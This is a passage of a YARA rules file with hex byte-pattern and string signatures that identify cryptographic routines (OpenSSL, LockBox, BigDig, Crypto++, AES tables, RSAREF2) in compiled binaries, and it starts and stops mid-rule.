E8 ?? ?? ?? ?? 8B B4 24 EC 02 00 00 83 C4 04 8B 46 0C 85 C0 74 32 56 53 E8 ?? ?? ?? ?? 83 C4 08 85 C0 0F 84 BA 02 00 00 57 8D 44 24 28 53 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_simple\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_simple\"\r\n\tstrings:\r\n\t\t$c0 = { B8 98 02 00 00 E8 ?? ?? ?? ?? 8B 84 24 A4 02 00 00 55 56 33 ED 50 89 6C 24 1C 89 6C 24 18 E8 ?? ?? ?? ?? 8B F0 83 C4 04 3B F5 89 74 24 0C 75 1B 8B 8C 24 A4 02 00 00 6A 01 51 E8 ?? ?? ?? ?? 83 C4 08 5E 5D 81 C4 98 02 00 00 C3 53 57 8B BC 24 BC 02 00 00 57 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B D8 83 C4 08 3B DD 0F 84 71 02 00 00 8D 54 24 28 52 E8 ?? ?? ?? ?? 8B AC 24 BC 02 00 00 8B 84 24 B4 02 00 00 57 55 8D 4C 24 34 50 51 C7 44 24 30 01 00 00 00 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_BN_mod_exp_inverse\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"OpenSSL BN_mod_exp_inverse\"\r\n\tstrings:\r\n\t\t$c0 = { B8 18 00 00 00 E8 ?? ?? ?? ?? 53 55 56 57 8B 7C 24 38 33 C0 57 89 44 24 20 89 44 24 24 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 57 89 44 24 1C E8 ?? ?? ?? ?? 57 8B F0 E8 ?? ?? ?? ?? 57 89 44 24 28 E8 ?? ?? ?? ?? 57 8B E8 E8 ?? ?? ?? ?? 57 8B D8 E8 ?? ?? ?? ?? 8B F8 8B 44 24 54 50 89 7C 24 38 E8 ?? ?? ?? ?? 83 C4 20 89 44 24 24 85 C0 8B 44 24 2C 0F 84 78 05 00 00 85 C0 75 05 E8 ?? ?? ?? ?? 85 C0 89 44 24 1C 0F 84 63 05 00 00 8B 4C 24 14 6A 01 51 E8 ?? ?? ?? ?? 6A 00 57 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule OpenSSL_DSA\r\n{\r\n\tmeta:\r\n\t\tauthor=\"_pusher_\"\r\n\t\tdate=\"2016-08\"\r\n\tstrings:\t\r\n\t\t$a0 = \"bignum_data\" wide ascii nocase\r\n\t\t$a1 = \"DSA_METHOD\" wide ascii nocase\r\n\t\t$a2 = \"PDSA\" wide ascii nocase\r\n\t\t$a3 = \"dsa_mod_exp\" wide ascii nocase\r\n\t\t$a4 = \"bn_mod_exp\" wide ascii nocase\r\n\t\t$a5 = \"dsa_do_verify\" wide ascii nocase\r\n\t\t$a6 = \"dsa_sign_setup\" wide ascii nocase\r\n\t\t$a7 = \"dsa_do_sign\" wide ascii nocase\r\n\t\t$a8 = \"dsa_paramgen\" wide ascii nocase\r\n\t\t$a9 = \"BN_MONT_CTX\" wide ascii nocase\r\n\tcondition:\r\n\t\t7 of ($a*)\r\n}\r\n\r\nrule FGint_RsaSign\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"FGint RsaSign\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 B8 53 56 57 89 4D F8 8B FA 89 45 FC 8B 75 0C 8B 5D 10 8B 45 FC E8 ?? ?? ?? ?? 8D 45 F0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 E0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 D0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 C0 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 B8 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 F0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\n\r\nrule LockBox_RsaEncryptFile\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox RsaEncryptFile\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F8 53 56 8B F1 8B DA 6A 20 8B C8 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 FC 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 68 FF FF 00 00 8B CB B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8A 45 08 50 8B CE 8B 55 F8 8B 45 FC E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_DecryptRsaEx\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox DecryptRsaEx\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F4 53 56 57 89 4D F8 89 55 FC 8B D8 33 C0 8A 43 04 0F B7 34 45 ?? ?? ?? ?? 0F B7 3C 45 ?? ?? ?? ?? 8B CE B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F4 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 55 FC 8B CE 8B 45 F4 E8 ?? ?? ?? ?? 6A 00 B1 02 8B D3 8B 45 F4 E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 3B C7 7E 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 F4 E8 ?? ?? ?? ?? 8B C8 8B 55 F8 8B 45 F4 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_EncryptRsaEx\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox EncryptRsaEx\"\r\n\tstrings:\r\n\t\t$c0 = { 55 8B EC 83 C4 F8 53 56 57 89 4D FC 8B FA 8B F0 33 C0 8A 46 04 0F B7 1C 45 ?? ?? ?? ?? 8B CB B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 F8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B D7 8B 4D 08 8B 45 F8 E8 ?? ?? ?? ?? 6A 01 B1 02 8B D6 8B 45 F8 E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 3B C3 7E 16 B9 ?? ?? ?? ?? B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 F8 E8 ?? ?? ?? ?? 8B C8 8B 55 FC 8B 45 F8 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 F8 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule LockBox_TlbRsaKey\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"LockBox TlbRsaKey\"\r\n\tstrings:\r\n\t\t$c0 = { 53 56 84 D2 74 08 83 C4 F0 E8 ?? ?? ?? ?? 8B DA 8B F0 33 D2 8B C6 E8 ?? ?? ?? ?? 33 C0 8A 46 04 8B 15 ?? ?? ?? ?? 0F B7 0C 42 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 46 0C 33 C0 8A 46 04 8B 15 ?? ?? ?? ?? 0F B7 0C 42 B2 01 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 46 10 8B C6 84 DB 74 0F E8 ?? ?? ?? ?? 64 8F 05 00 00 00 00 83 C4 0C 8B C6 5E 5B C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_bpInit\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig bpInit\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B 74 24 0C 6A 04 56 E8 ?? ?? ?? ?? 8B C8 8B 44 24 10 83 C4 08 85 C9 89 08 75 04 33 C0 5E C3 89 70 08 C7 40 04 00 00 00 00 5E C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModExp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModExp\"\r\n\tstrings:\r\n\t\t$c0 = { 56 8B 74 24 18 85 F6 75 05 83 C8 FF 5E C3 53 55 8B 6C 24 18 57 56 55 E8 ?? ?? ?? ?? 8B D8 83 C4 08 BF 00 00 00 80 8B 44 9D FC 85 C7 75 04 D1 EF 75 F8 83 FF 01 75 08 BF 00 00 00 80 4B EB 02 D1 EF 8B 44 24 18 56 8B 74 24 18 50 56 E8 ?? ?? ?? ?? 83 C4 0C 85 DB 74 4F 8D 6C 9D FC 8B 4C 24 24 8B 54 24 20 51 52 56 56 56 E8 ?? ?? ?? ?? 8B 45 00 83 C4 14 85 C7 74 19 8B 44 24 24 8B 4C 24 20 8B 54 24 18 50 51 52 56 56 E8 ?? ?? ?? ?? 83 C4 14 83 FF 01 75 0B 4B BF 00 00 00 80 83 ED 04 EB }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC 2C 07 00 00 8D 84 24 CC 00 00 00 53 56 8B B4 24 44 07 00 00 57 56 6A 01 50 E8 ?? ?? ?? ?? 8B 8C 24 4C 07 00 00 56 8D 94 24 80 02 00 00 51 52 E8 ?? ?? ?? ?? 8D 84 24 BC 01 00 00 56 50 E8 ?? ?? ?? ?? 8B 9C 24 64 07 00 00 56 8D 4C 24 30 53 51 E8 ?? ?? ?? ?? 8D 54 24 38 56 52 BF 01 00 00 00 E8 ?? ?? ?? ?? 83 C4 34 85 C0 0F 85 ED 00 00 00 8D 44 24 0C 56 50 8D 8C 24 78 02 00 00 56 8D 94 24 48 03 00 00 51 8D 84 24 18 04 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C 24 BC 01 00 00 56 8D 94 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 98 01 00 00 8D 54 24 00 56 8B B4 24 B0 01 00 00 57 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 C0 01 00 00 8B 94 24 B4 01 00 00 8D 3C 36 56 50 8D 4C 24 20 57 51 52 E8 ?? ?? ?? ?? 8D 44 24 2C 57 50 E8 ?? ?? ?? ?? 83 C4 2C 33 C0 5F 5E 81 C4 98 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_mpModulo\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig mpModulo\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 10 81 EC 30 03 00 00 8B 8C 24 38 03 00 00 8D 54 24 00 56 8B B4 24 40 03 00 00 57 8B BC 24 4C 03 00 00 57 50 56 51 8D 84 24 B0 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 94 24 54 03 00 00 8D 4C 24 20 57 51 52 E8 ?? ?? ?? ?? 8D 44 24 2C 56 50 E8 ?? ?? ?? ?? 8D 8C 24 CC 01 00 00 56 51 E8 ?? ?? ?? ?? 83 C4 34 33 C0 5F 5E 81 C4 30 03 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModExpB\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModExpB\"\r\n\tstrings:\r\n\t\t$c0 = { 53 8B 5C 24 10 55 56 BE 00 00 00 80 85 F3 75 04 D1 EE 75 F8 8B 6C 24 14 8B C5 D1 EE 89 44 24 18 74 48 57 8B 7C 24 20 EB 04 8B 44 24 1C 57 50 50 8D 44 24 28 50 E8 ?? ?? ?? ?? 83 C4 10 85 F3 74 14 8B 4C 24 1C 57 55 8D 54 24 24 51 52 E8 ?? ?? ?? ?? 83 C4 10 D1 EE 75 D0 8B 44 24 14 8B 4C 24 1C 5F 5E 89 08 5D 33 C0 5B C3 8B 54 24 10 5E 5D 5B 89 02 33 C0 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModInv\"\r\n\tstrings:\r\n\t\t$c0 = { 51 8B 4C 24 10 55 56 BD 01 00 00 00 33 F6 57 8B 7C 24 18 89 6C 24 0C 85 C9 74 42 53 8B C7 33 D2 F7 F1 8B C7 8B F9 8B DA 33 D2 F7 F1 8B CB 0F AF C6 03 C5 8B EE 8B F0 8B 44 24 10 F7 D8 85 DB 89 44 24 10 75 D7 85 C0 5B 7D 13 8B 44 24 1C 8B 4C 24 14 2B C5 5F 89 01 5E 33 C0 5D 59 C3 8B 54 24 14 5F 5E 33 C0 89 2A 5D 59 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule BigDig_spModMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"BigDig spModMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 83 EC 08 8D 54 24 00 50 51 52 E8 ?? ?? ?? ?? 8B 44 24 24 6A 02 8D 4C 24 10 50 51 E8 ?? ?? ?? ?? 8B 54 24 24 89 02 33 C0 83 C4 20 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule CryptoPP_ApplyFunction\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP ApplyFunction\"\r\n\tstrings:\r\n\t\t$c0 = { 51 8D 41 E4 56 8B 74 24 0C 83 C1 F0 50 51 8B 4C 24 18 C7 44 24 0C 00 00 00 00 51 56 E8 ?? ?? ?? ?? 83 C4 10 8B C6 5E 59 C2 08 00 }\r\n\t\t$c1 = { 51 53 56 8B F1 57 6A 00 C7 44 24 10 00 00 00 00 8B 46 04 8B 48 04 8B 5C 31 04 8D 7C 31 04 E8 ?? ?? ?? ?? 50 8B CF FF 53 10 8B 44 24 18 8D 56 08 83 C6 1C 52 56 8B 74 24 1C 50 56 E8 ?? ?? ?? ?? 83 C4 10 8B C6 5F 5E 5B 59 C2 08 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_RsaFunction\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP RsaFunction\"\r\n\tstrings:\r\n\t\t$c0 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 81 EC 9C 00 00 00 8B 84 24 B0 00 00 00 53 55 56 33 ED 8B F1 57 3B C5 89 B4 24 A8 00 00 00 89 6C 24 10 BF 01 00 00 00 74 18 C7 06 ?? ?? ?? ?? C7 46 20 ?? ?? ?? ?? 89 7C 24 10 89 AC 24 B4 00 00 00 8D 4E 04 E8 ?? ?? ?? ?? 8D 4E 10 89 BC 24 B4 00 00 00 E8 ?? ?? ?? ?? 8B 06 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 48 04 C7 04 31 ?? ?? ?? ?? 8B 16 8B 42 04 8B 54 24 10 83 CA 02 8D 48 E0 89 54 24 10 89 4C 30 FC 89 5C 24 18 89 7C }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 08 8B 44 24 1C 53 8B 5C 24 1C 56 8B F1 57 33 C9 89 74 24 10 3B C1 89 4C 24 0C 74 7B C7 46 04 ?? ?? ?? ?? C7 46 3C ?? ?? ?? ?? C7 46 30 ?? ?? ?? ?? C7 46 34 ?? ?? ?? ?? 3B D9 75 06 89 4C 24 28 EB 0E 8B 43 04 8B 50 0C 8D 44 1A 04 89 44 24 28 8B 56 3C C7 44 24 0C 07 00 00 00 8B 42 04 C7 44 30 3C ?? ?? ?? ?? 8B 56 3C 8B 42 08 C7 44 30 3C ?? ?? ?? ?? 8B 56 3C C7 46 38 ?? ?? ?? ?? 8B 42 04 C7 44 30 3C }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 08 8B 44 24 18 56 8B F1 57 85 C0 89 74 24 0C C7 44 24 08 00 00 00 00 74 63 C7 46 04 ?? ?? ?? ?? C7 46 3C ?? ?? ?? ?? C7 46 30 ?? ?? ?? ?? C7 46 34 ?? ?? ?? ?? 8B 46 3C C7 44 24 08 07 00 00 00 8B 48 04 C7 44 31 3C ?? ?? ?? ?? 8B 56 3C 8B 42 08 C7 44 30 3C ?? ?? ?? ?? 8B 4E 3C C7 46 38 ?? ?? ?? ?? 8B 51 04 C7 44 32 3C ?? ?? ?? ?? 8B 46 3C 8B 48 08 C7 44 31 3C ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8D 7E 04 6A 00 8B CF }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule CryptoPP_Integer_constructor\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"CryptoPP Integer constructor\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 08 56 83 F8 08 8B F1 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 8D 04 95 00 00 00 00 89 16 50 E8 ?? ?? ?? ?? 8B 4C 24 0C 89 46 04 C7 46 08 00 00 00 00 89 08 8B 0E 8B 46 04 83 C4 04 49 74 0F 57 8D 78 04 33 C0 F3 AB 8B C6 5F 5E C2 08 00 8B C6 5E C2 08 00 }\r\n\t\t$c1 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8B F1 89 74 24 04 C7 06 ?? ?? ?? ?? 6A 08 C7 44 24 14 00 00 00 00 C7 46 08 02 00 00 00 E8 ?? ?? ?? ?? 89 46 0C C7 46 10 00 00 00 00 C7 06 ?? ?? ?? ?? 8B 46 0C 83 C4 04 C7 40 04 00 00 00 00 8B 4E 0C 8B C6 5E C7 01 00 00 00 00 8B 4C 24 04 64 89 0D 00 00 00 00 83 C4 10 C3 }\r\n\t\t$c2 = { 6A FF 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 51 56 8B F1 57 89 74 24 08 C7 06 ?? ?? ?? ?? 8B 7C 24 1C C7 44 24 14 00 00 00 00 8B CF E8 ?? ?? ?? ?? 83 F8 08 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 85 D2 89 56 08 76 12 8D 04 95 00 00 00 00 50 E8 ?? ?? ?? ?? 83 C4 04 EB 02 33 C0 89 46 0C 8B 4F 10 89 4E 10 }\r\n\t\t$c3 = { 56 57 8B 7C 24 0C 8B F1 8B CF E8 ?? ?? ?? ?? 83 F8 08 77 09 8B 14 85 ?? ?? ?? ?? EB 37 83 F8 10 77 07 BA 10 00 00 00 EB 2B 83 F8 20 77 07 BA 20 00 00 00 EB 1F 83 F8 40 77 07 BA 40 00 00 00 EB 13 48 50 E8 ?? ?? ?? ?? BA 01 00 00 00 8B C8 83 C4 04 D3 E2 8D 04 95 00 00 00 00 89 16 50 E8 ?? ?? ?? ?? 8B 16 89 46 04 8B 4F 08 83 C4 04 89 4E 08 8B 4F 04 85 D2 76 0D 2B C8 8B 3C 01 89 38 83 C0 04 4A 75 F5 8B C6 5F 5E C2 04 00 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule RijnDael_AES\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { A5 63 63 C6 84 7C 7C F8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_CHAR\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES (check2) [char]\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_CHAR_inv\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES S-inv [char]\"\r\n\t\t//needs improvement\r\n\t\tdate = \"2016-07\"\r\n\tstrings:\r\n\t\t$c0 = { 48 38 47 00 88 17 33 D2 8A 56 0D 8A 92 48 38 47 00 88 57 01 33 D2 8A 56 0A 8A 92 48 38 47 00 88 57 02 33 D2 8A 56 07 8A 92 48 38 47 00 88 57 03 33 D2 8A 56 04 8A 92 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RijnDael_AES_LONG\r\n{\tmeta:\r\n\t\tauthor = \"_pusher_\"\r\n\t\tdescription = \"RijnDael AES\"\r\n\t\tdate = \"2016-06\"\r\n\tstrings:\r\n\t\t$c0 = { 63 7C 77 7B F2 6B 6F C5 30 01 67 2B FE D7 AB 76 CA 82 C9 7D FA 59 47 F0 AD D4 A2 AF 9C A4 72 C0 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_NN_modExp\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modExp\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC 1C 02 00 00 53 55 56 8B B4 24 30 02 00 00 57 8B BC 24 44 02 00 00 57 8D 84 24 A4 00 00 00 56 50 E8 ?? ?? ?? ?? 8B 9C 24 4C 02 00 00 57 53 8D 8C 24 B4 00 00 00 56 8D 94 24 3C 01 00 00 51 52 E8 ?? ?? ?? ?? 57 53 8D 84 24 4C 01 00 00 56 8D 8C 24 D4 01 00 00 50 51 E8 ?? ?? ?? ?? 8D 54 24 50 57 52 E8 ?? ?? ?? ?? 8B 84 24 78 02 00 00 8B B4 24 74 02 00 00 50 56 C7 44 24 60 01 00 00 00 E8 ?? ?? ?? ?? 8D 48 FF 83 C4 44 8B E9 89 4C 24 18 85 ED 0F 8C AF 00 00 00 8D 34 AE 89 74 24 }\r\n\tcondition:\r\n\t\tany of them\r\n}\r\n\r\nrule RsaRef2_NN_modInv\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modInv\"\r\n\tstrings:\r\n\t\t$c0 = { 81 EC A4 04 00 00 53 56 8B B4 24 BC 04 00 00 57 8D 84 24 ?? 00 00 00 56 50 E8 ?? ?? ?? ?? 8D 8C 24 1C 01 00 00 BF 01 00 00 00 56 51 89 BC 24 A0 00 00 00 E8 ?? ?? ?? ?? 8B 94 24 C8 04 00 00 56 8D 84 24 AC 01 00 00 52 50 E8 ?? ?? ?? ?? 8B 9C 24 D8 04 00 00 56 8D 4C 24 2C 53 51 E8 ?? ?? ?? ?? 8D 54 24 34 56 52 E8 ?? ?? ?? ?? 83 C4 30 85 C0 0F 85 ED 00 00 00 8D 44 24 0C 56 50 8D 8C 24 A0 01 00 00 56 8D 94 24 AC 02 00 00 51 8D 84 24 34 03 00 00 52 50 E8 ?? ?? ?? ?? 8D 8C 24 2C 01 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_NN_modMult\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 NN_modMult\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 0C 8B 4C 24 08 81 EC 08 01 00 00 8D 54 24 00 56 8B B4 24 20 01 00 00 56 50 51 52 E8 ?? ?? ?? ?? 8B 84 24 2C 01 00 00 56 8D 0C 36 50 8B 84 24 28 01 00 00 8D 54 24 1C 51 52 50 E8 ?? ?? ?? ?? 68 08 01 00 00 8D 4C 24 2C 6A 00 51 E8 ?? ?? ?? ?? 83 C4 30 5E 81 C4 08 01 00 00 C3 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPrivateDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPrivateDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 8B 8C 24 94 00 00 00 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 50 8B 84 24 98 00 00 00 51 8D 4C 24 0C 50 8D 54 24 14 51 52 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F 85 8B 00 00 00 39 74 24 04 74 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 8A 44 24 08 84 C0 75 6B 8A 4C 24 09 B8 02 00 00 00 3A C8 75 5E 8D 4E FF 3B C8 76 0D 8A 54 04 08 84 D2 74 05 40 3B C1 72 F3 40 3B C6 73 45 8B 94 24 ?? 00 00 00 8B CE 2B C8 89 0A 8D 51 0B }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPrivateEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPrivateEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 8B 54 24 10 81 EC 80 00 00 00 8D 4A 0B 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 80 00 00 00 C3 8B CE B8 02 00 00 00 2B CA C6 44 24 04 00 49 C6 44 24 05 01 3B C8 76 23 53 55 8D 69 FE 57 8B CD 83 C8 FF 8B D9 8D 7C 24 12 C1 E9 02 F3 AB 8B CB 83 E1 03 F3 AA 8D 45 02 5F 5D 5B 52 8B 94 24 94 00 00 00 C6 44 04 08 00 8D 44 04 09 52 50 E8 ?? ?? ?? ?? 8B 8C 24 A4 00 00 00 8B 84 24 98 00 00 00 51 8B 8C 24 98 00 00 00 8D 54 24 14 56 52 50 51 E8 }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPublicDecrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPublicDecrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 8B 8C 24 94 00 00 00 56 8B 30 83 C6 07 C1 EE 03 3B CE 76 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 50 8B 84 24 98 00 00 00 51 8D 4C 24 0C 50 8D 54 24 14 51 52 E8 ?? ?? ?? ?? 83 C4 14 85 C0 0F 85 8E 00 00 00 39 74 24 04 74 0D B8 06 04 00 00 5E 81 C4 84 00 00 00 C3 8A 44 24 08 84 C0 75 6E 80 7C 24 09 01 75 67 B8 02 00 00 00 8D 4E FF 3B C8 76 0D B2 FF 38 54 04 08 75 05 40 3B C1 72 F5 8A 4C 04 08 40 84 C9 75 45 8B 94 24 ?? 00 00 00 8B CE 2B C8 89 0A }\r\n\tcondition:\r\n\t\t$c0\r\n}\r\n\r\nrule RsaRef2_RsaPublicEncrypt\r\n{\tmeta:\r\n\t\tauthor = \"Maxx\"\r\n\t\tdescription = \"RsaRef2 RsaPublicEncrypt\"\r\n\tstrings:\r\n\t\t$c0 = { 8B 44 24 14 81 EC 84 00 00 00 53 8B 9C 24 98 00 00 00 57 8B 38 83 C7 07 8D 4B 0B C1 EF 03 3B CF 76 0E 5F B8 06 04 00 00 5B 81 C4 84 00 00 00 C3 8B D7 55 2B D3 56 BE 02 00 00 00 C6 44 24 14 00 8D 6A FF C6 44 24 15 02 3B EE 76 28 8B 84 24 AC 00 00 00 8D 4C 24 13 50 6A 01 51 E8 ?? ?? ?? ?? 8A 44 24 1F 83 C4 0C 84 C0 74 E1 88 44 34 14 46 3B F5 72 D8 8B 94 24 A0 00 00 00 53 8D 44 34 19 52 50 C6 44 